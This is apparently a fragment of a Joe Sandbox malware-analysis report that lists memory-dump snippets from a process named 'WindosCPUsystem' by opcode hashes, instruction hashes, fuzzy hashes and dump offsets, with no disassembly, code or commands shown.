                                                                                                        • Instruction ID: 7e6e72d6d24138d2526690dfcdb70ec2c15f6eddc6040e25c263ea2d9e279c5e
                                                                                                        • Opcode Fuzzy Hash: 42ce4f6f7723d8c4dc9cb1e84545ab77e45c4ce9a78c3a36606dcc06f184ade7
                                                                                                        • Instruction Fuzzy Hash: CA516721F2DACA0FE7ACBA2C58066B677E1EF98750F04027DD04EC3287DD28E8474281
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d09c11e4538719f7b07b664d7b0a28fd11baadb26a304f15301dcbe7a0b8725f
                                                                                                        • Instruction ID: 0ed8858328fbb941fabfb0b4e1ce6538b103730af853d98a6d27dd24ce24aeae
                                                                                                        • Opcode Fuzzy Hash: d09c11e4538719f7b07b664d7b0a28fd11baadb26a304f15301dcbe7a0b8725f
                                                                                                        • Instruction Fuzzy Hash: D2618271E1DA994FDFB8EE2888517A577E5EF99340F0442F9D04DD3282CE34AD458781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 53a896be406e6c90134a729838fcb998cd11d5f15b1784fe50fe8812f896ab99
                                                                                                        • Instruction ID: b8cbd73771882f9c587ff346553289f0cf9fa92861b1db076c7ad9727c66da8a
                                                                                                        • Opcode Fuzzy Hash: 53a896be406e6c90134a729838fcb998cd11d5f15b1784fe50fe8812f896ab99
                                                                                                        • Instruction Fuzzy Hash: C251D330B1D9998FEB98EB2C9459A7577E5EF59344F1402BDE00DC72A3DE29EC428740
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 376a1afc93ddc15c4b89b6cffa1ac1dcb5ae1e81c420b51a5f59a00f59781b1d
                                                                                                        • Instruction ID: 14a7da088dd62843b9221662e611ba80ca6d73614380df0a21296f3eec9ac903
                                                                                                        • Opcode Fuzzy Hash: 376a1afc93ddc15c4b89b6cffa1ac1dcb5ae1e81c420b51a5f59a00f59781b1d
                                                                                                        • Instruction Fuzzy Hash: CA512931A0CE864FFBB5EB7C98951B077E1EF95350B1806BAC04DCB1A6D919EC82C350
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 307ca67d0a8e00490c3fa9ca371ebc0aa6c269cc378b25aa5660e2d703ede4a0
                                                                                                        • Instruction ID: 5b4343b99c47cdeea35700aeea1377f9b9add236431f83d6dbe764633106e3de
                                                                                                        • Opcode Fuzzy Hash: 307ca67d0a8e00490c3fa9ca371ebc0aa6c269cc378b25aa5660e2d703ede4a0
                                                                                                        • Instruction Fuzzy Hash: DE51D231B1C98A4FEB98EE2C94557B977E2FB58744F1841B9D44DC7286DE28EC428780
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c617e3d7fb9a4295b89f70e81443daec51845f527757b8536df73dec6c425641
                                                                                                        • Instruction ID: aaa0ef1ba7264a44e47fe9ededd07a65c7b915a247315b1932c4ca045640e2dd
                                                                                                        • Opcode Fuzzy Hash: c617e3d7fb9a4295b89f70e81443daec51845f527757b8536df73dec6c425641
                                                                                                        • Instruction Fuzzy Hash: B651E531D0DA994FEBB4EF2CA8552B97BE5EF99360F1403BAD04DC72D2DD2498068781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 878f79763fb5130b314944e203a26c2c19f8bbfbf9be05972b578da7f9cbe7c5
                                                                                                        • Instruction ID: d8f48b957f8eb488dfb7e3b5b857f4ed91dc44da43cdcbca907cc29e03e37ae4
                                                                                                        • Opcode Fuzzy Hash: 878f79763fb5130b314944e203a26c2c19f8bbfbf9be05972b578da7f9cbe7c5
                                                                                                        • Instruction Fuzzy Hash: 1251153191EBC54FD742AB7888656A57FF1EF57224B0945EBC08ACB1A7DE1CA80BC311
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8fdbf58501c33e778dac0937823b3c448802c10c94319474334c0ae0d3ae5aa5
                                                                                                        • Instruction ID: b0fc9b67b07bd983fd93ff21eb8cf6dfd43a463ef9859f098235bb3ed7bda148
                                                                                                        • Opcode Fuzzy Hash: 8fdbf58501c33e778dac0937823b3c448802c10c94319474334c0ae0d3ae5aa5
                                                                                                        • Instruction Fuzzy Hash: 7D414131B0CD5C5FDFA8FB6CE455AADB7E1EF99351B04026AE00DD3296CE25AC418781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8a93e7a3e16793276eeafb49435d19df76e73b499d464393d4e1f95d362be72c
                                                                                                        • Instruction ID: f5dcc0ef7253edcb9ac5f26bb3007b2bfdafd0a05433f3d21eca7db51b611d66
                                                                                                        • Opcode Fuzzy Hash: 8a93e7a3e16793276eeafb49435d19df76e73b499d464393d4e1f95d362be72c
                                                                                                        • Instruction Fuzzy Hash: 2251B43090C6898FEFA9EF28C855AA97BA1FF59340F140279D44DC72D6DB35E856C780
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4e30d68b26c588d0842b072bc654a3ec32858e7516b41beee9c66fdb67be9d5f
                                                                                                        • Instruction ID: 6819fc49a105351b268a30e43a0ca447e8de4c128fd97a9bb49aad08173e2b99
                                                                                                        • Opcode Fuzzy Hash: 4e30d68b26c588d0842b072bc654a3ec32858e7516b41beee9c66fdb67be9d5f
                                                                                                        • Instruction Fuzzy Hash: 97515A7090DBC64FDB79FF2884175647BE1FF96351F1406BAC88DC71A6DA28E80A8781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3063edb0a5a703a8f48a3354ca87f9a4d90b611aba1b5e7972a65ae44ae80495
                                                                                                        • Instruction ID: abec6d12d49567070da9549e7e61dfd89a9c018c227c8baa2211fd98187b6201
                                                                                                        • Opcode Fuzzy Hash: 3063edb0a5a703a8f48a3354ca87f9a4d90b611aba1b5e7972a65ae44ae80495
                                                                                                        • Instruction Fuzzy Hash: 12412631B0D9894FEBA5EB2C9854AB47BD2FF99360B0901F6D04DC72A7DE18EC428741
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9e57a2e7f2ae8a584c49db250b9105944e299b20a00d6e79a747c184f3ceb086
                                                                                                        • Instruction ID: 215bfb5a5a8dd515cceb725e74b3bb883e87cc8b658959084fae57ec7a543a02
                                                                                                        • Opcode Fuzzy Hash: 9e57a2e7f2ae8a584c49db250b9105944e299b20a00d6e79a747c184f3ceb086
                                                                                                        • Instruction Fuzzy Hash: F041273190EBC54FD742AB3888556A57FF0EF57224B0941EBC089CB1A7DE1CA80AC351
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b46f3d77c123d0375c91789c13ca63f37f62d13205e4684f6c14cef3b9c955f3
                                                                                                        • Instruction ID: 0485b4676be1727136ee1215a1a47a0a6bedc89bdb968ea290eec3b35251b3f4
                                                                                                        • Opcode Fuzzy Hash: b46f3d77c123d0375c91789c13ca63f37f62d13205e4684f6c14cef3b9c955f3
                                                                                                        • Instruction Fuzzy Hash: 4741E531B1CD494FEBA8EA2C9898A7537D7FF993A071901B9D40DC7297DE14EC428740
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0e6d140d9ae501434c4ef7f07d5c221a4a99eb12ffa57d81c3b3b57489bef6ab
                                                                                                        • Instruction ID: a4419e477ee3bd997c3dec75770a52afa989bb3e1936cd20001716da6c4d8331
                                                                                                        • Opcode Fuzzy Hash: 0e6d140d9ae501434c4ef7f07d5c221a4a99eb12ffa57d81c3b3b57489bef6ab
                                                                                                        • Instruction Fuzzy Hash: 7141EF70A0D9598FDFA8EF28C851B6877A1EF99340F1442A8D44DD7392CE34ED85CB40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fba35f81c3bb4031c6b4417463c4ebd46a62a2bdab9b64b7545025dd99795fcd
                                                                                                        • Instruction ID: 4064ff2a659c5079fd2bdb4bde70a002ca4cf9cac382844cf9ba4a5888b1dced
                                                                                                        • Opcode Fuzzy Hash: fba35f81c3bb4031c6b4417463c4ebd46a62a2bdab9b64b7545025dd99795fcd
                                                                                                        • Instruction Fuzzy Hash: 9931163190DA894FEBB4EE2CC4566B437D4FF5A351F1407BAE88DC72A5DA14EC0A8781
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cc6e00d13c75a02ac9339fb8a9ea7b66dfb685e556399495c683488b64297420
                                                                                                        • Instruction ID: 30e6ef58a47338a8811ebca880de2038a3eb7dc975f9be4fae485103f67e46ba
                                                                                                        • Opcode Fuzzy Hash: cc6e00d13c75a02ac9339fb8a9ea7b66dfb685e556399495c683488b64297420
                                                                                                        • Instruction Fuzzy Hash: 07315E30A1CE888FDBD8FB6CD495A2977D2EF98351B5402AEF04DC72A6CE24DC418741
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fb7b88f3a5af01bc7743f0370783c919b467c2f741a0d5f42582ab381a676c68
                                                                                                        • Instruction ID: fd48f674f1d49b448858cae08ca17cfbbd6e9dd244e80c2ece7a59b8ba95de1a
                                                                                                        • Opcode Fuzzy Hash: fb7b88f3a5af01bc7743f0370783c919b467c2f741a0d5f42582ab381a676c68
                                                                                                        • Instruction Fuzzy Hash: CE31C121B0DD9A4FEBA9AF1D585977837C9EF99755B4801B9E48DC32E2CE08EC018245
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1eaf1127d8cdd440d95bbf1be1777a85e34352a3734a542b138a4be80a4c33c2
                                                                                                        • Instruction ID: 850873f54e0ad7ac093ec9af93690960817a231da9799501914f23c1e620098f
                                                                                                        • Opcode Fuzzy Hash: 1eaf1127d8cdd440d95bbf1be1777a85e34352a3734a542b138a4be80a4c33c2
                                                                                                        • Instruction Fuzzy Hash: 47316622A0DA865FE765FB7CA8500EA7BE1EF85324B08437BD049C72D7DE28A4458384
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fbde4bc7951df9b7d14fbd19a49d686b3332235418ded6cbe22cbf67da3dedc0
                                                                                                        • Instruction ID: 2b3141c9a5e34402052b983d03aa1d7f8b2bbda226dd18f64a0d8905e2a18c57
                                                                                                        • Opcode Fuzzy Hash: fbde4bc7951df9b7d14fbd19a49d686b3332235418ded6cbe22cbf67da3dedc0
                                                                                                        • Instruction Fuzzy Hash: B6315631D1CAC64FEB79AB3854252B03BD6EF14350F1845BEC249C75C3DE29E8868341
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9dd274ceea64673415b2a2d83a0a3d8c10ffaaef8f4b0eff25f3e6a36494492c
                                                                                                        • Instruction ID: d8f258a9bbea2734dfb5e8f1adc329993cfeb09510a80de0a29f4ed87dc7ae26
                                                                                                        • Opcode Fuzzy Hash: 9dd274ceea64673415b2a2d83a0a3d8c10ffaaef8f4b0eff25f3e6a36494492c
                                                                                                        • Instruction Fuzzy Hash: 5831D73060CA894FDBE5EF2C9494AB57BE1FF99350B1506BAE04DC3696CE29DC42C741
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5a39b7884fb54939582edd9f47a7ea7cfd9a0722dd3d812198b666719f62b159
                                                                                                        • Instruction ID: 58cb4d5c3669dfb07827efefa2b0452e40e72e93f198b4aeb808f1e3f817bf50
                                                                                                        • Opcode Fuzzy Hash: 5a39b7884fb54939582edd9f47a7ea7cfd9a0722dd3d812198b666719f62b159
                                                                                                        • Instruction Fuzzy Hash: 9A317171E1C68ADEEF74EE6884492BDB7F4FF69B80F240575C009A2185DF28AD85C742
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fc6bed5326850645187d8ccfdb8b8727e6beece6c477efcc40031d0222536792
                                                                                                        • Instruction ID: 6215891ed057bfdaf029a687430f9eb789a37a74781625d3f0ab824757dee0c8
                                                                                                        • Opcode Fuzzy Hash: fc6bed5326850645187d8ccfdb8b8727e6beece6c477efcc40031d0222536792
                                                                                                        • Instruction Fuzzy Hash: 1821A621B1DD8A5FFEA5FF2C50546B562E5FFA8781B54427AD00DC3295CE18EC454380
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 441e9998537930a65110bd2a71ea3d191a6e8988a196adb2b863efb5b210bdd8
                                                                                                        • Instruction ID: cd3ab2ea1768c24665bdc011bba2a4c72f137a5e0d380416f4e646e7c0db9aad
                                                                                                        • Opcode Fuzzy Hash: 441e9998537930a65110bd2a71ea3d191a6e8988a196adb2b863efb5b210bdd8
                                                                                                        • Instruction Fuzzy Hash: 4731EB31A0DA894FDF65FF289409AA977D4EF86355B0406FED04DC7292DE29E846C381
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e55e320340e4ac4517529acbf2885306f00dad24736a1b859b6434599f2c733d
                                                                                                        • Instruction ID: 22ee80e1f8a1c0e9f52a5bce2de3ce9fb832320a92ee57927fb516c7a24aa88b
                                                                                                        • Opcode Fuzzy Hash: e55e320340e4ac4517529acbf2885306f00dad24736a1b859b6434599f2c733d
                                                                                                        • Instruction Fuzzy Hash: 61315C71D1C94E9EEFA4EE6898457B977E1FB68650F1005BAC408E3291DE34A8828B91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 366549a3d9b2790e64d6f173b1199b0fdcae98507ea24d6225d7587ababe1648
                                                                                                        • Instruction ID: 77a0a41cb3b6e06953259a3249daafa66a2e56bce1d8d7d30c97a55f331c8fed
                                                                                                        • Opcode Fuzzy Hash: 366549a3d9b2790e64d6f173b1199b0fdcae98507ea24d6225d7587ababe1648
                                                                                                        • Instruction Fuzzy Hash: F721F631B0DE954FEB99EB7C9855AA477E1EF5934070402FAD04DCB296C918EC428381
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3f66e031bc0d8b2f8d6a1e91cd7f4aee7c18c0c7fbada878372006b3392a0b5a
                                                                                                        • Instruction ID: f8d46a1c97e8bfa72738616a06dcbfeacce7ffaa928dea5a48782c8ffd7f6ae1
                                                                                                        • Opcode Fuzzy Hash: 3f66e031bc0d8b2f8d6a1e91cd7f4aee7c18c0c7fbada878372006b3392a0b5a
                                                                                                        • Instruction Fuzzy Hash: 64210871E0894A9FDFA4EF68D4467ED77A1FF68740F100575D408E3285DB38A8828B80
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6e56e29471da0798755c1d395dfc079017649947053bb8072188a1a92c2fb834
                                                                                                        • Instruction ID: 74e7c21a670943ea733a17465790be59a3a04635cfb436056d88ae12422254ca
                                                                                                        • Opcode Fuzzy Hash: 6e56e29471da0798755c1d395dfc079017649947053bb8072188a1a92c2fb834
                                                                                                        • Instruction Fuzzy Hash: 6521F571E1895A8EEFA4EF28D8457AD77B1FB68740F1041B5C40CE3292DB34A9818B81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5813f550f902bb2f5814d05393bc761a981953e950dbc09384c657d389409ec9
                                                                                                        • Instruction ID: b9cdff6215908c5781c14e9344b7ad1560d82cf3ca3da4b2cc0ead902e6b869a
                                                                                                        • Opcode Fuzzy Hash: 5813f550f902bb2f5814d05393bc761a981953e950dbc09384c657d389409ec9
                                                                                                        • Instruction Fuzzy Hash: 48212F71D1855E8FEFA4EF18C846BE977A1FB68740F1041B5C50CD3295DB34AD858B81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2763926675.00007FF849020000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849020000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff849020000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9e914926315f08bce7ae243bd86c15b216af92a7beca9058c2a48000ece65144
                                                                                                        • Instruction ID: f2e2131fa99d87d998d52224f18049587c8215a8cdc53cc88b8a5980b02a1de5
                                                                                                        • Opcode Fuzzy Hash: 9e914926315f08bce7ae243bd86c15b216af92a7beca9058c2a48000ece65144
                                                                                                        • Instruction Fuzzy Hash: 9E21F471E18A5A9FEFA4EF28D8567AD77B1FF68744F1001B5C40CD3281DB34A9828B81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8738f238c013d8783a76f03df20e212e96ca582d871c7948baa661fd6b534da5
                                                                                                        • Instruction ID: 3238c4c83b5b9fd2e24a759bb71464532e4d4e308ebfa494fa50a569bef99e05
                                                                                                        • Opcode Fuzzy Hash: 8738f238c013d8783a76f03df20e212e96ca582d871c7948baa661fd6b534da5
                                                                                                        • Instruction Fuzzy Hash: AA31C370D0D5DA8FEF25EF2C88166E9BBA0AF45354F0805FEC04D972D2CA7C59818B16
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4848b7ecf308101b949e6a9f16839aa4079e22413bf3a45db26b355a5da72c93
                                                                                                        • Instruction ID: 556abc3b5069329d30570da2d7eee86daff39096d9eca24b1f0988008634b86c
                                                                                                        • Opcode Fuzzy Hash: 4848b7ecf308101b949e6a9f16839aa4079e22413bf3a45db26b355a5da72c93
                                                                                                        • Instruction Fuzzy Hash: 45112922A1EBC64FE754FABCA4951F6BBA1EF942547044277D04EC3287DD28A945C390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 79aedf5bd2deab099109d59b676234cd8f951f6e6a849ce9f61fed469de05b87
                                                                                                        • Instruction ID: a277ae345548f1570c4d64152961ce24cf9f369c13e15971cca3e21782b9827f
                                                                                                        • Opcode Fuzzy Hash: 79aedf5bd2deab099109d59b676234cd8f951f6e6a849ce9f61fed469de05b87
                                                                                                        • Instruction Fuzzy Hash: 10F0BB7360CA1C5EA728A91DAC0B5F777E8D796671B01023FE08EC3512ED21B81746D5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.2766660594.00007FF8490D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490D0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_7ff8490d0000_WindosCPUsystem.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
